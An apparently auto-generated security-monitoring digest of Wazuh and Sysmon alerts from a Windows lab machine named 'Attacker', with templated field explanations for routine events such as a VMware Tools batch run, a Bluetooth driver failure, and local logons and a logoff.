data.win.system.systemTime:  2025-04-24T22:48:07.3897224Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2425
Incremental log record number – handy for timeline order.

data.win.system.processID:  14384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:07Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.261+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.261+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2414193
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  BTHUSB
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  17
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:48:59.6557881Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3055
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10108
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.binary:  000000000100000000000000110005C0000000000000000000000000000000000000000000000000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:45.339+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.339+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2415577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:48:59.7576790Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344372
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:48:59.088 ProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ProcessId: 3372 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:48:59.088
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.917+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.917+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2421197
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8658034Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43982
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31B4686 Linked Logon ID: 0x31C1A7D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.948+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.948+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2428919
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8658429Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43983
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31C1A7D Linked Logon ID: 0x31B4686 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.010+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.010+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

